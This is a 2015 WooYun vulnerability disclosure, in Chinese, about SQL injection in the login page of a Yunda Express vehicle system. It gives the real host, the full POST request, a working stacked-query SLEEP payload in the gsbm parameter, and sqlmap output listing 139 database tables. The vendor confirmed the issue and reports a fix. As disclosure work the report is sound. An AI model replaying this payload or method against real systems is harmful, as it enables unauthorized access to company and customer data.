当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090335

漏洞标题:韵达快递某系统SQL注入,各种数据库再次侧漏(指哪补哪)~

相关厂商:韵达快递

漏洞作者: 小饼仔

提交时间:2015-01-06 18:37

修复时间:2015-02-20 18:38

公开时间:2015-02-20 18:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-06: 细节已通知厂商并且等待厂商处理中
2015-01-07: 厂商已经确认,细节仅向厂商公开
2015-01-17: 细节向核心白帽子及相关领域专家公开
2015-01-27: 细节向普通白帽子公开
2015-02-06: 细节向实习白帽子公开
2015-02-20: 细节向公众公开

简要描述:

指哪补哪,韵达你真的修复了吗?

详细说明:


点进去看了下,有个页面
http://car.yundasys.com:81/yd_khd/khd_add.php
未授权访问,可以上传任意文件,厂商的确修复了,跳转到了登陆页面

11111111.jpg


看到登陆处,习惯性的输入了单引号,点登陆,没反应,抓包看了下,500错误,估计有戏

2222222222222.jpg


然后随便输入用户名和密码,重复提交了几次,都提示用户名或密码错误,验证码可以重复使用
post请求

POST /yd_khd/login_ajax.php HTTP/1.1
Host: car.yundasys.com:81
Proxy-Connection: keep-alive
Content-Length: 58
Accept: */*
Origin: http://car.yundasys.com:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://car.yundasys.com:81/yd_khd/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: theme=1; PHPSESSID=uml5sm1q4mv2of8b0r6b9orqo2
RA-Ver: 2.8.6
RA-Sid: 65E7C870-20141208-023412-580933-2bd67e
lb=0&sign=login&gsbm=aaa&password=aaaa&v_code1=6657&sb_gs=


漏洞证明:

丢到sqlmap里

---
Place: POST
Parameter: gsbm
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: lb=0&sign=login&gsbm=aaa'; SELECT SLEEP(5)-- &password=aaa&v_code1=9122&sb_gs=
---
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0.11
current database:    'ydserver'
Database: ydserver
[139 tables]
+----------------------+
| base_accountlimit    |
| base_dept_payitem    |
| base_gs_services     |
| base_payitem         |
| base_services        |
| bd_townships         |
| cainiao_county       |
| cfjlb                |
| chinese_spell        |
| city                 |
| clfhfs               |
| clkfl                |
| clklb                |
| cllx                 |
| company_english      |
| county               |
| county_level_city    |
| county_level_city_gs |
| cqkh                 |
| cz_fl                |
| cz_fz                |
| czy                  |
| czygh                |
| dbwh_new             |
| del_gs               |
| deny_ip              |
| dmlb                 |
| fcz                  |
| fczcy                |
| fhdh                 |
| gs                   |
| gs_md                |
| gs_md_log            |
| gs_qjd               |
| gs_tz                |
| gs_wy                |
| gs_wy_bak            |
| gs_wy_log            |
| gs_wy_xgjl           |
| gs_xgjl              |
| gsjcb                |
| gsjj                 |
| gsjl                 |
| gsqx                 |
| gstmfw               |
| hkdm                 |
| ic_site_bound        |
| jbdm                 |
| jl_uploadexcel       |
| jobcls_ratio         |
| jobpos_latt_comp     |
| log_interface        |
| mdz                  |
| mdzcy                |
| op_sap_contrast      |
| op_sap_czpara        |
| op_sap_gs            |
| prep_secret_key      |
| province             |
| psfwbz               |
| pswdjh               |
| qx                   |
| qx_rggy              |
| ry                   |
| ry_rz                |
| ry_zw                |
| sap_car_basic        |
| sap_car_company      |
| sheng                |
| shi                  |
| smlb                 |
| sq_fl                |
| sq_fl_log            |
| sq_pssx              |
| sq_pssx_log          |
| sqlj_fl              |
| sqlj_fl_log          |
| sx_gswh              |
| tbkh                 |
| tbl_ljz              |
| tbl_ljz_db           |
| tbl_ljz_dtl          |
| tbl_ljz_dtl_db       |
| tbl_lp_fl            |
| tbl_lp_fl_db         |
| tbl_pjz              |
| tbl_pjz_db           |
| tbl_pjz_dtl          |
| tbl_pjz_dtl_db       |
| tl_jobcls            |
| tl_jobcls_dtl        |
| tl_jobpos            |
| tl_latt_mouth        |
| tl_plan              |
| tl_user_ratio        |
| tm_group             |
| tm_group_member      |
| tm_level             |
| townships            |
| vipkhqx              |
| wd_menu              |
| wd_menu_priv         |
| wd_menu_sub          |
| wd_menu_sub_priv     |
| wd_system            |
| wd_system_priv       |
| wd_townships         |
| wdfl                 |
| wdjjsj               |
| wdjjsj_log           |
| wdmdz                |
| wdmdz_number         |
| wdtmfw               |
| wdzzz_bind           |
| wdzzz_cw             |
| wdzzzbd              |
| wjjl                 |
| wtj                  |
| www_wd               |
| wy                   |
| wy_ls_fl             |
| wy_ps_fl             |
| xm                   |
| xywy                 |
| ycpsf                |
| yd_cas_emp           |
| yd_cas_org           |
| yd_clear_fbzx        |
| yd_sxwh_cl           |
| yd_wdgygk            |
| ywy                  |
| ywygroup             |
| ywygroup_number      |
| zdzzfcz              |
| zdzzfcz_bak          |
| zdzzmdz              |
| zdzzmdz_bak          |
| zw                   |
| zzfl                 |
+----------------------+


好了,危害什么的,看 WooYun: 韵达某处任意文件上传导致各种数据库侧漏(疑似各种韵达系统数据库) 就知道了,就不深入了

修复方案:

别指哪补哪!

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-07 09:42

厂商回复:

已做修复,谢谢

最新状态:

暂无